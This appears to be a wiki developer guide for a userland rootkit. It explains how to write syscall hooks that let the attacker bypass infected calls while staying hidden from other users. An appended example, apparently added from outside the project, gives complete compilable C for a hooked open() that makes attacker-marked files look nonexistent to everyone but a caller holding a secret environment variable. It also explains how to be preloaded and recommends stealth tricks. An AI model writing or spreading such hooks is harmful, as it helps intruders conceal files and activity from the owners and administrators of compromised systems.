mzap edited this page May 7, 2015 · 12 revisions

Developer's Guide

Hooks

Every hook must have:

  • A prototype in hooks.h
  • An associated .c file
  • A test suite

Our hooks are defined in hooks.h, a C header file that our builder parses to write config.h, which is then used during compilation. Parsing hooks.h lets the builder generate the REAL_HOOKS list in config.h, through which every hook reaches the real syscall, so that the attacker's own sessions never go through an infected syscall.

Prototype in hooks.h

The prototype must always specify the return type, followed by the real syscall name, separated by a single space. It must end with HOOKED, a macro defined earlier in the header file.

<return_type> <syscall>(args) HOOKED;

Associated .c file

Each hook lives in its own .c file. Every hook must call the real syscall once it has identified the attacker; for any other caller it may do whatever you want it to do, keeping stealth in mind. Our DEBUG macro is there for debugging purposes and must be present in every hook.

Test suite

Each hook must be tested to ensure that nothing breaks and that the hook stays stealthy. Those tests must be placed in the tests/core-unittests directory.
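As an added example (not code from this project), here is one complete hook written to the three conventions above, collapsed into a single file so it compiles on its own on Linux: the hooks.h prototype ending in HOOKED, the config.h-side definitions, the open.c hook body with the DEBUG macro and the attacker check, and the call into the real syscall. Everything beyond what the page states is an assumption: the attacker is recognised by an environment variable named HOOK_SECRET, paths containing `__hidden__` are hidden from everyone else, HOOKED is a visibility attribute, DEBUG is compiled in only under HOOK_DEBUG, and the real syscall is reached through syscall(2) with SYS_openat rather than through the builder-generated REAL_HOOKS table.

```c
/* Added example, not the project's own code. Linux only.
 * Assumed names: HOOK_SECRET (env var that marks the attacker),
 * "__hidden__" (path marker to hide), HOOK_DEBUG (debug build switch). */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* --- what hooks.h would carry --- */
/* Assumed definition: export the symbol so the preloaded object wins. */
#define HOOKED __attribute__((visibility("default")))
#ifdef HOOK_DEBUG
#define DEBUG(fmt, ...) fprintf(stderr, "[hook] " fmt "\n", ##__VA_ARGS__)
#else
#define DEBUG(fmt, ...) do { } while (0)
#endif
/* <return_type> <syscall>(args) HOOKED; */
int open(const char *path, int flags, ...) HOOKED;

/* --- what the builder would write into config.h --- */
#define HOOK_MAGIC_ENV    "HOOK_SECRET"  /* assumed attacker marker */
#define HOOK_MAGIC_STRING "__hidden__"   /* assumed hidden-path marker */

/* Stand-in for the REAL_HOOKS entry: bypass the (hooked) libc wrapper
 * and enter the kernel directly, so the attacker never hits infected code. */
static int real_open(const char *path, int flags, mode_t mode)
{
    return (int)syscall(SYS_openat, AT_FDCWD, path, flags, mode);
}

/* Attacker identification: presence of the magic environment variable. */
int is_attacker(void)
{
    return getenv(HOOK_MAGIC_ENV) != NULL;
}

/* Stealth policy: hide any path carrying the magic substring. */
int should_hide(const char *path)
{
    return path != NULL && strstr(path, HOOK_MAGIC_STRING) != NULL;
}

/* --- what open.c would carry --- */
int open(const char *path, int flags, ...)
{
    mode_t mode = 0;
    if (flags & O_CREAT) {            /* mode is only passed with O_CREAT */
        va_list ap;
        va_start(ap, flags);
        mode = (mode_t)va_arg(ap, int);
        va_end(ap);
    }
    DEBUG("open(%s, 0x%x) attacker=%d", path ? path : "(null)", flags, is_attacker());

    if (!is_attacker() && should_hide(path)) {
        /* Look exactly like a file that does not exist: same return, same errno. */
        errno = ENOENT;
        return -1;
    }
    return real_open(path, flags, mode);
}

/* Stand-alone demonstration: create a hidden file as the attacker, then
 * show that a normal caller cannot see it while the attacker still can. */
int main(void)
{
    const char *p = "/tmp/__hidden__.demo";
    setenv(HOOK_MAGIC_ENV, "1", 1);
    int fd = open(p, O_CREAT | O_WRONLY, 0600);
    if (fd >= 0) close(fd);
    unsetenv(HOOK_MAGIC_ENV);
    printf("victim   open: %d (errno %d)\n", open(p, O_RDONLY), errno);
    setenv(HOOK_MAGIC_ENV, "1", 1);
    fd = open(p, O_RDONLY);
    printf("attacker open: %d\n", fd);
    if (fd >= 0) close(fd);
    unlink(p);
    return 0;
}
```

Built as a shared object (gcc -shared -fPIC) this is the preload form; built as a plain executable, the local definition of open interposes libc's for that process, which is enough to exercise both branches. The stealth detail worth copying is in the hidden branch: it returns the same -1/ENOENT pair a genuinely missing file produces, so a caller cannot distinguish "hidden" from "absent" by return value or errno.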
